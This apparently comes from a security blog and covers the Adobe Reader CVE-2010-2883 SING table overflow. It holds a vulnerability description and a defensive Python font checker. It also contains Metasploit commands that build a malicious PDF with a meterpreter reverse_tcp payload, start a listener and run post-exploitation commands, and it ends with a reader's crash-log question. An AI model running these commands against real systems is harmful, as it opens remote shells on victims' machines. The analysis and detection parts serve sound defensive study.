CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow

Timeline :

Vulnerability exploited in the wild and discovered by Mila Parkour on 2010-09-06
Metasploit PoC provided on 2010-09-08

PoC provided by :

sn0wfl0w
vicheck
jduck

Reference(s) :

CVE-2010-2883
APSA10-02

Affected version(s) :

Adobe Reader 9.3.4 and previous versions for Windows, Macintosh and UNIX.
Adobe Acrobat 9.3.4 and previous versions for Windows and Macintosh.

Tested on Windows XP SP3 with :

Adobe Reader 9.3.4

Description :

This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are assumed to be vulnerable as well.
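
A defensive check for the malformed field named in the title, as an added example that is not part of the original post or the Metasploit module: it parses a font's sfnt table directory, locates the SING table and flags a uniqueName that is not NUL-terminated within its fixed-size field. The 16-byte offset and 28-byte size of uniqueName are assumptions taken from the public SING glyphlet layout; `find_table`, `check_sing` and `build_font` are hypothetical names, and the sample fonts are constructed.

```python
import struct

UNIQUE_NAME_OFFSET = 16  # assumption: eight 2-byte fields precede uniqueName
UNIQUE_NAME_SIZE = 28    # assumption: 27 ASCII characters plus a terminating NUL

def find_table(font: bytes, tag: bytes):
    """Return the bytes of sfnt table `tag` (clipped to the file), or None."""
    if len(font) < 12:
        return None
    num_tables = struct.unpack_from(">H", font, 4)[0]
    for i in range(num_tables):
        rec = 12 + 16 * i
        if rec + 16 > len(font):
            break
        name, _checksum, offset, length = struct.unpack_from(">4sIII", font, rec)
        if name == tag:
            return font[offset:offset + length]
    return None

def check_sing(font: bytes) -> str:
    """Classify a font as 'no-sing', 'ok' or 'suspicious: <reason>'."""
    table = find_table(font, b"SING")
    if table is None:
        return "no-sing"
    if len(table) < UNIQUE_NAME_OFFSET + UNIQUE_NAME_SIZE:
        return "suspicious: SING table too short to hold uniqueName"
    name = table[UNIQUE_NAME_OFFSET:UNIQUE_NAME_OFFSET + UNIQUE_NAME_SIZE]
    end = name.find(b"\x00")
    if end == -1:
        return "suspicious: uniqueName has no NUL terminator in its 28 bytes"
    if any(b > 0x7F for b in name[:end]):
        return "suspicious: uniqueName contains non-ASCII bytes"
    return "ok"

def build_font(unique_name: bytes) -> bytes:
    """Constructed sample: a minimal sfnt file holding only a SING table."""
    sing = struct.pack(">8H", 0, 1, 0, 0, 0, 0, 0, 0)          # header fields
    sing += unique_name.ljust(UNIQUE_NAME_SIZE, b"\x00")[:UNIQUE_NAME_SIZE]
    sing += bytes(17)                                           # remaining fields zeroed
    header = struct.pack(">IHHHH", 0x00010000, 1, 16, 0, 0)     # one table
    record = struct.pack(">4sIII", b"SING", 0, 28, len(sing))   # data at offset 28
    return header + record + sing

if __name__ == "__main__":
    for label, sample in [("well-formed", build_font(b"MyGlyphlet")),
                          ("unterminated", build_font(b"A" * 28)),
                          ("truncated", build_font(b"MyGlyphlet")[:40])]:
        print(label, "->", check_sing(sample))
```

Fonts embedded in a PDF usually sit inside compressed streams, so extract and decompress the font program before passing its bytes to `check_sing`.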

Commands :

use exploit/windows/fileformat/adobe_cooltype_sing
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -j

sessions -i 1
sysinfo
getuid
ipconfig

One Reply to “CVE-2010-2883 : Adobe CoolType SING Table “uniqueName” Stack Buffer Overflow”

  1. Hi,

    I think my computer has been attacked with this exploit because I have the following event log in my Windows:

    Nombre de la aplicación con errores: firefox.exe versión: 1.9.2.4095 marca de tiempo: 0x4d852c95
    Nombre del módulo con errores: icucnv36.dll versión: 3.6.0.0 marca de tiempo: 0x470eff71
    Código de excepción: 0xc0000005
    Desplazamiento de errores: 0x0002a715
    Id. del proceso con errores: 0x708
    Hora de inicio de la aplicación con errores: 0x01cc72607c30096a
    Ruta de acceso de la aplicación con errores: C:\Program Files\Mozilla Firefox\firefox.exe
    Ruta de acceso del módulo con errores: C:\Program Files\Adobe\Reader 9.0\Reader\icucnv36.dll
    Id. del informe: ef27a56c-de56-11e0-bc54-000c29b8c4af

    How can I know what the attacker did? In other words, how can I know what command to run after the attacker exploits this vulnerability?

    Thanks.
    Regards.
